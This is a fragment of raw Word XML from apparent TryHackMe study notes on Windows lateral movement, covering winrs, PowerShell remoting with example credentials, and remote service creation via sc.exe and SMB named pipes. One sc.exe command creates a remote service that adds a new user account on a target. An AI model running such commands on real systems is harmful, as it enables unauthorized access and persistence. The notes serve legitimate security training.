        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2A4B">
        <w:t>Usually found in C:\Windows\System32\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224B347" w14:textId="1E9780D4" w:rsidR="00BE193D" w:rsidRPr="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:t>winrs.exe -u:Administrator -p:Mypass123 -r:target cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39050A54" w14:textId="26168B00" w:rsidR="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:r w:rsidRPr="00BE193D">
        <w:t>We can achieve the same from </w:t>
      </w:r>
      <w:r w:rsidR="003B5EDE" w:rsidRPr="00BE193D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE193D">
        <w:t xml:space="preserve">, but to pass different credentials, we will need to create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE193D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PSCredential</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE193D">
        <w:t xml:space="preserve"> object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F98D3A8" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRPr="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:t>$username = 'Administrator';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FCAB8D" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRPr="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:t>$password = 'Mypass123';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4DF9B1" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRPr="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:t xml:space="preserve">$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0670E15B" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:t>$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A9644" w14:textId="77777777" w:rsidR="006F6EF3" w:rsidRDefault="006F6EF3" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9B2A04" w14:textId="64E7EB2C" w:rsidR="00BE193D" w:rsidRDefault="006F6EF3" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r>
        <w:t># Then connect by one of these folowing commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8B7E1" w14:textId="77777777" w:rsidR="006F6EF3" w:rsidRDefault="006F6EF3" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1B3144" w14:textId="3FC12C99" w:rsidR="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Enter-PSSession</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE193D">
        <w:t xml:space="preserve"> -Computername TARGET -Credential $credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F84924E" w14:textId="64E72DAE" w:rsidR="00BE193D" w:rsidRPr="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B846C" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRPr="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Invoke-Command</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE193D">
        <w:t xml:space="preserve"> -Computername TARGET -Credential $credential -ScriptBlock {whoami}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6412FBC7" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D"/>
    <w:p w14:paraId="1C3EF446" w14:textId="5287D1C6" w:rsidR="00AE397D" w:rsidRPr="00AE397D" w:rsidRDefault="00AE397D" w:rsidP="00AE397D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE397D">
        <w:t>Remotely </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE397D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE397D">
        <w:t xml:space="preserve"> Using </w:t>
      </w:r>
      <w:r w:rsidR="00867B29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362DDD4C" w14:textId="77777777" w:rsidR="00AE397D" w:rsidRPr="00AE397D" w:rsidRDefault="00AE397D" w:rsidP="00AE397D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE397D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F8B79" w14:textId="77777777" w:rsidR="00AE397D" w:rsidRPr="00AE397D" w:rsidRDefault="00AE397D" w:rsidP="00AE397D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE397D">
        <w:t>135/TCP, 49152-65535/TCP (DCE/RPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E652C9" w14:textId="77777777" w:rsidR="00AE397D" w:rsidRPr="00AE397D" w:rsidRDefault="00AE397D" w:rsidP="00AE397D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE397D">
        <w:t>445/TCP (RPC over SMB Named Pipes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0002BAD8" w14:textId="77777777" w:rsidR="00AE397D" w:rsidRPr="00AE397D" w:rsidRDefault="00AE397D" w:rsidP="00AE397D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE397D">
        <w:lastRenderedPageBreak/>
        <w:t>139/TCP (RPC over SMB Named Pipes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654FC8E" w14:textId="77777777" w:rsidR="00AE4CC9" w:rsidRDefault="00AE397D" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE397D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Required Group Memberships:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE397D">
        <w:t> Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7165C952" w14:textId="77777777" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A10770C" w14:textId="7569A82D" w:rsidR="00AE397D" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:r w:rsidRPr="00AE4CC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:t xml:space="preserve"> tool communicates with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Control Manager (SVCCTL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F546B" w14:textId="6B193458" w:rsidR="00AE397D" w:rsidRPr="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE4CC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve">running sc.exe locally: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1410A49B" w14:textId="551C464E" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE4CC9">
        <w:t xml:space="preserve">sc.exe create </w:t>
      </w:r>
      <w:r>
        <w:t>New</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:t>Service binPath= "C:\Program Files\MyApp.exe" start= auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F9FCA5" w14:textId="77777777" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:r>
        <w:t xml:space="preserve">binpath </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the path for binaries that this service will execute (we can create our own .exe file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A78DDF" w14:textId="4F2F5423" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:r>
        <w:t xml:space="preserve">locally </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:t xml:space="preserve"> sends a request to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Control Manager (SCM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:t>, which runs as a system process (services.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C09DB" w14:textId="77777777" w:rsidR="00AE397D" w:rsidRDefault="00AE397D" w:rsidP="00BE193D"/>
    <w:p w14:paraId="7406D8B1" w14:textId="02FE792F" w:rsidR="00AE397D" w:rsidRPr="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE4CC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>Running S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remotely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBF97B" w14:textId="13177FEB" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>sc.exe \\TARGET create THMservice binPath= "net user NewUsername NewUserPass /add" start= auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DBC7C5" w14:textId="482ED1FA" w:rsidR="00AE397D" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>sc.exe \\TARGET start THMservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B859B6E" w14:textId="583AE860" w:rsidR="00AE397D" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:t>start= auto → Sets the service to start automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799D9D64" w14:textId="1D53B010" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>sc.exe \\TARGET stop THMservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73514372" w14:textId="2EABEFE1" w:rsidR="00AE397D" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>sc.exe \\TARGET delete THMservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F9583D" w14:textId="15BB0224" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCCB529" w14:textId="1DD3BB8C" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:r>
        <w:t>Workflow For SC Remotely Run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4079200B" w14:textId="30D5D3B1" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Final Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:t xml:space="preserve"> tool </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:t xml:space="preserve">communicate with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4CC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Control Manager (SVCCTL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on Remote Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE9224D" w14:textId="77777777" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="00AE4CC9"/>
    <w:p w14:paraId="69096493" w14:textId="70A3E98D" w:rsidR="00AE4CC9" w:rsidRDefault="00AE4CC9" w:rsidP="007073CF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B7EA8D3" wp14:editId="7DABF129">
            <wp:extent cx="4691743" cy="2007525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="354722739" name="Picture 4" descr="A group of arrow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2739" name="Picture 4" descr="A group of arrows with tex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5814" cy="2013546"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B12314" w14:textId="77777777" w:rsidR="007073CF" w:rsidRDefault="007073CF" w:rsidP="007073CF">
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve">The client first connects to </w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Endpoint Mapper (EPM)</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve"> at port </w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>135</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF4682B" w14:textId="0DD08860" w:rsidR="007073CF" w:rsidRPr="007073CF" w:rsidRDefault="007073CF" w:rsidP="007073CF">
      <w:r>
        <w:t xml:space="preserve">This connection is by using </w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed Computing Environment / Remote Procedure Call (DCE/RPC)</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139BA649" w14:textId="77777777" w:rsidR="007073CF" w:rsidRPr="007073CF" w:rsidRDefault="007073CF" w:rsidP="007073CF">
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve">The EPM responds with the </w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dynamic port</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve"> where the </w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Control Manager (SVCCTL)</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve"> is listening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656AEA73" w14:textId="77777777" w:rsidR="007073CF" w:rsidRPr="00BE193D" w:rsidRDefault="007073CF" w:rsidP="00AE4CC9"/>
    <w:p w14:paraId="67226A82" w14:textId="0740CFCE" w:rsidR="00065C4A" w:rsidRDefault="00AE4CC9" w:rsidP="007073CF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FFC9D4C" wp14:editId="090DEFEB">
            <wp:extent cx="4708071" cy="1001974"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1415225853" name="Picture 5" descr="A white arrow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5853" name="Picture 5" descr="A white arrow with black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8917" cy="1004282"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E5320A" w14:textId="77777777" w:rsidR="004668D1" w:rsidRDefault="004668D1" w:rsidP="004668D1"/>
    <w:p w14:paraId="2432AE3C" w14:textId="55E7DFCE" w:rsidR="007073CF" w:rsidRPr="007073CF" w:rsidRDefault="007073CF" w:rsidP="007073CF">
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve">If the RPC connection </w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fails</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve"> (e.g., due to a firewall blocking high-range ports), sc.exe automatically falls back to </w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB named pipes</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve"> for communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752EE64" w14:textId="4C89C137" w:rsidR="007073CF" w:rsidRPr="007073CF" w:rsidRDefault="007073CF" w:rsidP="007073CF">
      <w:r w:rsidRPr="007073CF">
        <w:t>It uses a special named pipe called \</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pipe\svcctl</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve">, which allows managing services remotely via </w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB (port 445)</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetBIOS (port 139)</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51846E86" w14:textId="4A0B77B9" w:rsidR="004668D1" w:rsidRDefault="00AA2A4B" w:rsidP="00096D6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Pipe</w:t>
      </w:r>
      <w:r w:rsidR="00096D6E" w:rsidRPr="00096D6E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a method of </w:t>
      </w:r>
      <w:r w:rsidR="00096D6E" w:rsidRPr="00096D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>inter-process communication (IPC)</w:t>
      </w:r>
      <w:r w:rsidR="00096D6E" w:rsidRPr="00096D6E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allows data to flow between processes. It's like a virtual "tube" </w:t>
      </w:r>
      <w:r w:rsidR="00096D6E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">for communications between processes locally or remotely </w:t>
      </w:r>
      <w:r w:rsidR="00096D6E" w:rsidRPr="00096D6E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>where one process writes data, and another process reads it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1652FD" w14:textId="77777777" w:rsidR="00096D6E" w:rsidRPr="00096D6E" w:rsidRDefault="00096D6E" w:rsidP="00096D6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows supports two main types of pipes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268144A7" w14:textId="77777777" w:rsidR="00096D6E" w:rsidRPr="00096D6E" w:rsidRDefault="00096D6E" w:rsidP="00096D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Anonymous Pipes</w:t>
      </w:r>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Used for communication between related processes (e.g., parent-child processes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD15C1" w14:textId="2330E9AD" w:rsidR="00096D6E" w:rsidRPr="00096D6E" w:rsidRDefault="00096D6E" w:rsidP="00096D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Named Pipes</w:t>
      </w:r>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Used for communication between </w:t>
      </w:r>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unrelated processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or even over a </w:t>
      </w:r>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidRPr="00096D6E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D1DA83" w14:textId="77777777" w:rsidR="004668D1" w:rsidRDefault="004668D1" w:rsidP="004668D1"/>
    <w:p w14:paraId="1CD62046" w14:textId="77777777" w:rsidR="00096D6E" w:rsidRDefault="00096D6E" w:rsidP="004668D1"/>
    <w:p w14:paraId="5F84FC07" w14:textId="77777777" w:rsidR="00096D6E" w:rsidRPr="00F03ED7" w:rsidRDefault="00096D6E" w:rsidP="00F03ED7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03ED7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating Scheduled Tasks Remotely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDDF4B6" w14:textId="10A4C508" w:rsidR="00096D6E" w:rsidRPr="0007274E" w:rsidRDefault="00096D6E" w:rsidP="00F03ED7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007274E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>blind attack</w:t>
      </w:r>
      <w:r w:rsidR="00F03ED7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F03ED7" w:rsidRPr="00F03ED7">
        <w:t>(the command's output won't be available to us)</w:t>
      </w:r>
    </w:p>
